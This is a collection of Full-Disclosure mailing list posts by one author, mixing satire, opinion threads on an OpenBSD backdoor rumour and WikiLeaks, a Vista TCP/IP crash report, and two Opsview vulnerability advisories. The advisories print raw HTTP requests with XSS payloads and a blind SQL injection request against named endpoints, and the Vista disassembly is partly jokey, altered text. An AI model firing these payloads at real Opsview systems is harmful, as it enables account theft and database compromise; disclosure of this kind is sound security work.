[Full-disclosure] Security is fun(ny) again
Dozens of hundreds of years ago, I used to seek out the best of best regarding computer security. I sought them out to read the material they wrote. This went from BBS text files, to forums, IRC over to blog posts. Anything these folks may have made, videos they may uploaded with regards to security, you name it. I did so because this is how I began to learn computer security. Initially, I was intimidated by security folks, but eventually I learned, many are not only the smartest thinkers, but they're funny, they're cool, and most of all they're human. As time went on, I began contacting some of them, asking them questions, secretly being mentored by their answers, posts to mailing lists, and so forth. My digital rolodex grew, as did my knowledge. As an individual, I have an odd-ball sense of humor. Sort of dry, sort of dark. I then began asking off the cuff questions in an interview format to these peers. This all began circa 1997... And now its back to haunt my security peers since I became the most awesomest, handsomest, and feared thirteen thirty sevener since Thomas A. Anderson. Without further rambling, an AntiOffline redux Top Ten where security peers are asked the things that matter... to me For the redux launch, I hunted down Charlie Miller who was likely hacking a car on a highway or something. I managed to get his attention after a denial of service mailbomb using a Win98 mailbomber app, till he had no choice but to answer the questions, or face a million repeat msgs. Top Ten with Charlie Miller www.infiltrated.net/index.php?option=com_contentview=articleid=69 -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM Where ignorance is our master, there is no possibility of real peace - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View Version(s): Opsview pre 4.4.1 Author: J. Oquendo (joquendo at e-fensive dot net) I. ADVISORY Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View Date published: 2013-10-28 Vendor contacted: 2013-09-04 II. BACKGROUND Opsview is a systems management software built on open source software. To minimize noise, read more about it here http://www.opsview.com/about-us II. DESCRIPTION Opsview is vulnerable to a few different XSS based attacks. /admin/auditlog /info/host/ /login /status/service/recheck /viewport/ There are a variety of iterations within those functions which may allow a malicious user to trigger a cross site scripting attack. III. EXAMPLE GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] POST /login HTTP/1.1 Content-Length: 125 Content-Type: application/x-www-form-urlencoded Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] app=OPSVIEWback=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22login=Sign+inlogin_password=nologin_username=no POST /status/service/recheck HTTP/1.1 Content-Length: 144 Content-Type: application/x-www-form-urlencoded User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22host_selection=opsviewservice_selection=opsview%3bConnectivity%20-%20LANsubmit=Submit GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] III SOLUTION Opsview released a fix with Opsview 4.4.1 http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM Where ignorance is our master, there is no possibility of real peace - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-5694 Blind SQL Injection in Ops View
CVE-2013-5694 Blind SQL Injection in Ops View Version(s): Opsview pre 4.4.1 Author: J. Oquendo (joquendo at e-fensive dot net) I. ADVISORY Title: Blind SQL Injection in OpsView Date published: 2013-10-28 Vendor contacted: 2013-09-04 II. BACKGROUND Opsview is a systems management software built on open source software. To minimize noise, read more about it here http://www.opsview.com/about-us II. DESCRIPTION A Blind SQL injection vulnerability exists in OpsView acknowledge function. A malicious user can post bad data leading to a database dump, user creation, code execution, etc. POST /status/service/acknowledge HTTP/1.1 Content-Length: 118 Content-Type: application/x-www-form-urlencoded Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] comment=from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroupnotify=1service_selection=%24%7dsql injection goes here%7dsubmit=Submit For more on BSQLI read about it here: http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection III SOLUTION Opsview released a fix with Opsview 4.4.1 http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM Where ignorance is our master, there is no possibility of real peace - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gauss is out !
On 8/9/2012 9:43 AM, Peter Dawson wrote: Dubbed Gauss, the virus may also be capable of attacking critical infrastructure and was built in the same laboratories as Stuxnet, the computer worm widely believed to have been used by the United States and Israel to attack Iran's nuclear program, Kaspersky Lab said on Thursday. http://www.reuters.com/article/2012/08/09/net-us-cybersecurity-gauss-idUSBRE8780NJ20120809 /pd And it just took over Mars Rover Curiosity! http://www.infiltrated.net/index.php?option=com_contentview=articleid=54 -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett CCEC BDEE 74ED 0575 8104 7B90 B60D 6401 56CC DBEA http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xB60D640156CCDBEA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Flame - couldn't resist
It's Friday and I couldn't resist. Someone needs to do a VoiceOver -ala Direct TV, for AV companies When you use Windows, hackers target your machines. When hackers target your machine, you get compromised aad become part of a botnet When you become part of a botnet, your machine attacks Iranian nuclear facilities Don't let Windows attack nuclear facilities switch to McAfee. http://www.youtube.com/watch?v=mcYWvvv75dM -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett CCEC BDEE 74ED 0575 8104 7B90 B60D 6401 56CC DBEA http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xB60D640156CCDBEA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] STEP Security
Interweb Re-Engineering Task Force J. Oquendo Request for Comments 4012012 E-Fensive Security Strategies Category: Informational Expires: 2020 STEP by STEP Security Status of this Memo This Internet-Draft is submitted in full nonconformance with provisions of BCP 78 and BCP 79. This document may not be modified, and derivative works of it may not be created, except to publish it as an RFC and to translate it into languages other than English. Internet-Drafts are working documents of the Internet Engineering Task Force (IETF), its areas, and its working groups. Note that other groups may also distribute working documents as Internet- Drafts. Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as work in progress. The list of current Internet-Drafts can be accessed at http://www.ietf.org/ietf/1id-abstracts.txt The list of Internet-Draft Shadow Directories can be accessed at http://www.ietf.org/shadow.html This Internet-Draft will expire on April 01, 2020. Copyright Notice Copyright (c) 2012 IETF Trust and the persons identified as the document authors. All rights reserved. This document is subject to BCP 78 and the IETF Trust's Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Oquendo Expires Apr 01, 2020 [Page 1] Internet-Draft Security Step by STEP RFC 4012012 Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License. Abstract This framework describes a practical methodology for ensuring security in otherwise insecure environments. The goal is to provide a rapid response mechanism to defend against the advanced persistent threats in the wild. Table of Contents 1. Introduction..2 2. Conventions used in this document.4 3. Threats Explained.4 3.1. Possible Actors..4 4. STEP Explained5 5. STEP in Action6 6. Security Considerations...7 7. IANA Considerations...7 8. Conclusions...8 8.1. Informative References...8 9. Acknowledgments...8 Appendix A. Copyright9 1. Introduction In the network and computing industry, malicious actions, applications and actors have become more pervasive. Response times to anomalous events are burdening today's infrastructures and often strain resources. As networks under attack are often saturated with malicious traffic and advanced persistent threat actors engage in downloading terabytes of data, resources to combat these threats have diminished. Additionally, the threats are no longer just anonymized actors engaging in juvenile behavior, there are many instances of State Actors, disgruntled employees, contractors, third party vendors and criminal organizations. Each with separate agendas, each consistently targeting devices on the Internet. Oquendo Informational [Page 2] Internet-Draft Security Step by STEP RFC 4012012 The intent behind this document is to define a methodology for rapid response to these threats. In this document, security will be achieved using a new methodology and protocol henceforth named Scissor To Ethernet Protocol (STEP). Initially designed as a last approach for security, STEP ensures that no attacker can disaffect any of the Confidentiality, Integrity, Availability of data as a whole. Many variables are involved in security, but the STEP methodology focuses on the following: o FUD (Fear Uncertainty and Doubt) o SCAM (Security Compliance and Management) o APT (Another Possible Threat) This methodology proposes STEP that SHOULD be performed at the onset of a cyber attack before more terabytes of data are exfiltrated from a network. 1. Industry Standard IP
[Full-disclosure] Earth to Facebook
Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you guys down in an effort to assist you with security flaws. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Android Noise Camera Application Released
On 5/23/2011 3:29 PM, SecurityXploded Group wrote: Hi all, Android Noise Camera is the FREE mobile application designed to help in remote monitoring by capturing the images whenever there is high level of noise around the mobile device. It automatically takes the pictures from your mobile's camera whenever the noise level in the area surrounding the phone exceeds the threshold limit. You can configure NoiseCamera to store the pictures in SD card as well as automatically email it to you. It is simple, easy to use Android application created by one of our contributor - JavaAngelo. Now remember children, you must tweak this app prior to going to your local rave, club, prom, etc. otherwise kiss your SD storage sayanora -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft VISTA TCP/IP heap buffer underflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Microsoft VISTA TCP/IP heap buffer underflow Summary - - Microsoft Device IO Control wrapped by an API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer underflow corrupting kernel memory. Affected Systems - - Using the sample proof of concept, it was possible to verify this issue on following operating systems and configurations: * Microsoft Windows Vista Ultimate 32 bit It is very likely that other versions of Windows Vista are affected by this issue. This issue did not occur on Windows XP, Windows 2003 Advanced Server, Windows 2008 Server nor Windows Millenium Edition Re-installation of Service Pack 1 and/or upgrading to SP2 had any effect in regards to resolve the random crashes. To execute either the sample program or any other system command, the user has to be either the admin, in the admin group or the Administrators group. Since this buffer underflow never makes it to kernel memory, it could be possible that propping up the underflow will make it overflow and take control over the operating system without any restriction. Remedy - No remedy available at this time. Reported - This vulnerability is being reported now Relevant - 934b7a5c 85aa6fe4 934b7ac4 837100ee tcpip!IppCreateUnicastRoute+0xf0 934b7ae8 85a5d121 0001 858b6278 84d74ce8 tcpip!IppValidateSetAllRouteParameters+0x217 934b7b64 85a18a29 836c134c 92a84a70 tcpip!Ipv4SetAllRouteParameters+0x1d1 934b7ba4 8a844551 0001 92a326b4 NETIO!NsiSetAllParametersEx+0xbd 934b7bf0 8a844eb8 836c1330 836c1378 nsiproxy!NsippSetAllParameters+0x1b1 934b7c14 8a844f91 92a32601 8371d290 nsiproxy!NsippDispatchDeviceControl+0x88 934b7c2c 818f0053 8590b448 92a32698 92a32698 nsiproxy!NsippDispatch+0x33 934b7c44 81a80515 8371d290 92a32698 92a32708 nt!IofCallDriver+0x63 934b7c64 81a80cba 8590b448 8371d290 0027f700 nt!IopSynchronousServiceTail+0x1d9 934b7d00 81a6a98e 8590b448 92a32698 nt!IopXxxControlFile+0x6b7 934b7d34 8188ba7a 0044 0048 nt!NtDeviceIoControlFile+0x2a 934b7d34 77529a94 0044 0048 nt!KiFastCallEntry+0x12a 0027f68c 77528444 777214b9 0044 0048 ntdll!KiFastSystemCallRet 0027f690 777214b9 0044 0048 ntdll!ZwDeviceIoControlFile+0xc Disassembly with commands mov edi,edi push ebp mov ebp,esp push edi mov edi,dword ptr [ebp+8] lea eax,[ebp+8] push eax push dword ptr [edi+4] push 18h call NOMNOM!RtlULongAdd (85a1675d) test eax,eax jl OMNOM!PtpCreateNOM+0x1b push esi push 74704D4Eh push dword ptr [ebp+8] ; = 0x0020 push 0 call ExAllocatePoolWithTag ; eax = ExAllocatePoolWithTag(0, 0x20, 0x74704D4E, esi); mov esi,eax ; = 0x83716380 allocated buffer address test esi,esi je NOM!CreateOMNOM+0x6d push dword ptr [ebp+8] ; = 0x0020 push 0 push esi ; 0x83716380 allocated buffer address call NOM!memset (85a10543) ; memset((char*)0x83716380, 0, 0x20) mov eax,dword ptr [ebp+14h] mov dword ptr [esi],eax mov eax,dword ptr [ebp+18h] mov dword ptr [esi+0Ch],eax mov dword ptr [eax],esi mov eax,dword ptr [ebp+0Ch] and word ptr [esi+14h],0 add esp,0Ch push eax ; = 0x837100ee lea eax,[esi+18h] ; esi unchanged, holds the alloc. buffer address (=0x83716380) push eax ; = 0x83716398 add offset of 0x18 bytes to the allocated buffer inc dword ptr [edi+8] mov eax,esi pop esi pop edi pop ebp ret 14h nop nop nop om nom nom - -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFNlhDEK/fYPyEKla8RAnWXAJ0XaB/D0Cd0eYt+6Vd00Tx6RYsRmQCfWwGk QGt6mpCUiDKXxhCdg5xpi7M= =pjws -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
I can only speculate the following with regards to Perry coming out of the blue with this news and it obviously means nothing as I'm not a profiler, psychologist, etc. and even if I were, who cares at the end of the day. There is probably some form of credibility to perhaps the government wanting to backdoor OpenBSD or any other operating system but that obviously does not mean this occurred. What I think about his disclosure is, Perry sought to make something known to Theo which took Theo by surpise and Theo being who he is disclosed it to the public. The following strike me as odd though: I have never seen Theo come out of the blue publicly for something non-BSD related. I never struck him as the type to put his business out there especially in a case like this. My thoughts are: If he DID know something, why would he PUBLICLY out himself like that. It would have made more sense for him to keep that conversation private and lie enough to dissuade this Perry go to hush/think about things differently, etc. I'm think if it were me, I would have done the same had I no knowledge. Had I knowledge, my first thought would be: By publicly disclosing anything, the people I report(ed) to will be pissed and it'll kick up a firestorm (this is for those who speculate Theo had something to do with this). So I think, what does this Perry guy have against the others. Are there any documented exchanges or disagreements between Perry, Wright or Lowe? For someone to come out of the blue, name names 10 years later makes little sense. It must have been a hell of a bone to grind to wait 10 years once an NDA has expired to out someone. For that, an anonymous email to a mailing list would have sufficed as opposed to waiting 10 years. I then think, wait a minute, something like this (backdooring anything) must go beyond a 10 year NDA. Even if it didn't, the potential blowback Perry could face would be so enormous, it would not only be insane to come out of the woodworks, but likely career suicide as well. The 'bone to pick' doesn't sound realistic. After all, he could have submitted an anonymous email years ago to air his dirt. What I believe happened is an iteration of rumors. Perhaps there came a time when an agency in government wanted to place backdoors, maybe even approached BSD developers [1]. Did it fly? Only three people would completely know at the end of the day: Perry, Scott Lowe (whomever he is) Jason Wright. Would you like to help the government... We need you to ... which after time became the government placed a backdoor. Ten years is an awful long time to sit around with whiffs of news like this. I doubt a secret like that could have been kept secret for 10 long years. At the same time though, I doubt there is reason for Perry to outright make this up. I think maybe he heard a rumor and rolled with it. I've re-read Perry's email to Theo and another response. His initial e-mail didn't impose a sense of payback is a bitch but more of a I think you should know so for those claiming he wanted to get back at Theo you may be oblivious to the fact that he sent the email to Theo in private, not to a mailing list. That debunks any notion to me that he was trying to hurt Theo. He would have had to have known 100% that Theo would disclose the email. So the point of him coming out of the closet to hurt Theo is weak and moot if you ask me. As for the credibility of a former agent saying we tried it didn't work sounds fishy as well. I don't know about anyone else but I can't imagine him admitting to anything sure we backdoored it That wouldn't make any sense and would likely make him a few enemies both on and off that agency. At the end of the day though, I could honestly care less if they backdoored my VPN. They'd be might bored wondering why terminals are always tail -f'ing, and how the hell I manage to type so much without shutting up ;) [1] https://twitter.com/ejhilbert/status/14891845825863680 -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
On 12/15/2010 1:55 PM, bk wrote: On Dec 15, 2010, at 10:32 AM, Paul Schmehl wrote: --On December 14, 2010 8:40:14 PM -0500 b...@fbi.dhs.org wrote: http://www.downspout.org/?q=node/3 Seems IPSEC might have a back door written into it by the FBI? So for 10 years IPSEC has had a backdoor in it and not one person examining the code has noticed it? snip Read The Cathedral and The Bazaar. -- Paul Schmehl, Senior Infosec Analyst I call bullshit on all the people claiming this couldn't possibly have existed because anyone can read the source. How many of you understand crypto. OK, now how many of you _actually_ understand crypto? And of those, how many look at *BSD? There have been plenty of recent examples of Open Source projects that have had undetected security flaws for multiple years. It's not difficult to believe a relatively uncommon OS could have a subtle weakness in a difficult-to-understand part of the code. In this particular case, it looks to be total FUD by some lunatic with an axe to grind, but we shouldn't be so arrogant to assume that such a flaw _could not_ exist. BTW I actually use OpenBSD on many of my systems and I happen to think it's a very simple and practical OS, but I'm not blind to potential problems. -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ 2cents I take the Devil's Advocate approach here: We assume all the code in OpenBSD is audited for one. Secondly I quote Juvenal: */Quis custodiet ipsos custodes /*Who is to say the person auditing the code wasn't the one who backdoored the code, this assuming there is or was a backdoor. Thirdly, by Theo coming clean and offering disclosure to the public, it could remove the potential of being exposed via pre-emptive strike. If he stays shut and is exposed further down the road, it leads to more questioning. Again, this is assuming that 1) there is a backdoor 2) Theo somehow knew. Furthermore, to think along the lines of So for 10 years IPSEC has had a backdoor in it and not one person examining the code has noticed it, I too concur with the fact that crypto is a very specific and specialized area which many would not have the capabilities to audit. Because open source projects like OpenBSD are built around trust, there is no way to validate who is working on what. What does one propose in an area like an OpenBSD project? Background checks for all their developers, this would not solve the problem. I personally don't believe based on Theo's demeanor and approach to security that he would have allowed this let alone KNOWN that it occurred. However, the reality is, who is watching the watchers /2cents -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WikiLeaks
Harry Behrens wrote: If you don't understand why something like Wikileaks being down with no obvious reason or explanation is an issue - then I guess continue sleeping... And it is indeed a security issue - in fact of international proportions.. Oh please. The world does not stop for Wikileaks going down in fact, I guarantee you that in over 90% of the places you will visit this week, no one will know or even care that Wikileaks is down. Security issue of international proportions my ass. Life goes on, people go on, no government, agency, official, business nor individual stopped functioning, living, breathing because Wikileaks went down. Reality is, outside of a very small segment of individuals, no one cares to be quite frank. To prove this point, ask the next 10 people you say: Do you know Wikileaks is down!? and study their response. Wanna bet 99% will respond something similar to one of the following: So? What's Wikileaks? Why would Wikipedia be down? Who cares What do they do? Why should I care And this has what to do with me? -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WikiLeaks
Jonathan Kamens wrote: J. is not so sanguine about the mission of Wikileaks and/or how well it fulfills it and/or how important it is for protecting our lives and liberties. As we see from this comment: How well it protects who's liberties. Show me some factual information on where it saved anything for anyone. Or please explain to me and perhaps the thousands of soldiers from ALL SORTS of countries in Afghanistan, etc, how its protecting them by outing information with regards to military operations. Give me a break, I've been there, done that and to be honest, I grew up a while ago so spare the give me Wikileaks or give me death speech. Wikileaks wasn't the first, nor will it be the last. In any case, if I'm right that this is the kind of security issue that J. was referring to, then I agree with others who have said that this discussion does not belong on full-disclosure, and this will be my first and last message on the topic. 1) Security regarding network and or computing related capabilities, contexts, etc There is no purpose to the initial message and or thread 2) Security regarding wikileaks defending against ANYTHING other than someone's own pockets... Is also irrelevant. Perception and reality are two different equations to any interpretation of fact/story/etc. while you and others like you believe Wikileaks! - Defender of Justice I see Wikiwhore - Take the money and run Again, been there done that when I ran, Politrix way before wikileaks became a site, been there done that with JYA/Cryptome, been there done that with J Orlin Grabbe (RIP) and the list goes on. Spare me and the list the dramatics. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SANS ... CERT Handler
Can one of you guys shoot me an email -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] can someone please try and explain to me....
valdis.kletni...@vt.edu wrote: On Thu, 09 Jul 2009 13:06:58 EDT, J Michael Graham said: Man, I LOVE sayin it. I say it all the time. Boss comes in talking about budget cuts, I just stand up shouting CYBERWAR!! and he backs out the doorway. Mission accomplished. I find completing sentences with As prophesied in ancient scripture does that to bosses too. The problem is that most of what we've seen has been more properly described as 'cyber-espionage' or 'cyber-border-skirmish'. But most journalist's eyes glaze over if there's more than 7-8 letters in the word, so we're stuck with them using 'cyberwar'. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I personally find that it's more appealing and spookier to say cyberwar if you want to pass through - I don't know - your agenda, your budget. Nothing says We're underfunded from contractors more than cyberwar. Remember, many quotes come from many-a-DoD-contractor. Keep that in mind, when the sayings slash quotes shift from Korea is e-nuking us to we can neither confirm nor deny or we simply don't know you have to look at who's talking: In the dozens of instances that I worked over the past decade, I cannot recall a single instance in which someone intending to attack came from the source it appeared to have come from, said Dale W. Meyerrose, former chief information officer for the Office of the Director of National Intelligence. Most attackers in cyberspace try to mask who they really are. (NY Times) “The code is really pretty elementary in many respects,” he added. “I’m doubting that the author is a computer science graduate student.” Jose Nazarrio I put my money on Arbor's view. Remember, earlier this year according to media and government, China was all the rage. Budgets were passed and ironically all the Chinese hackers in the world retired. Think about that for a minute or two. It could make a good episode of Where are they now? In the interim, politics will be what politricks will be: dod-contractor:~# nemesis-icmp -S 202.130.245.42 -D 127.0.0.1 -i 4 echo China's cyberattacking us! We're simply underfunded |mail -s Cyberwarefare Siobhan.Gorman at wsj.com -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 227C 5D35 7DCB 0893 95AA 4771 1DCE 1FD1 5CCD 6B5E http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x5CCD6B5E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Introducing RMBSS - Risk Metrics Budgetary Scoring System
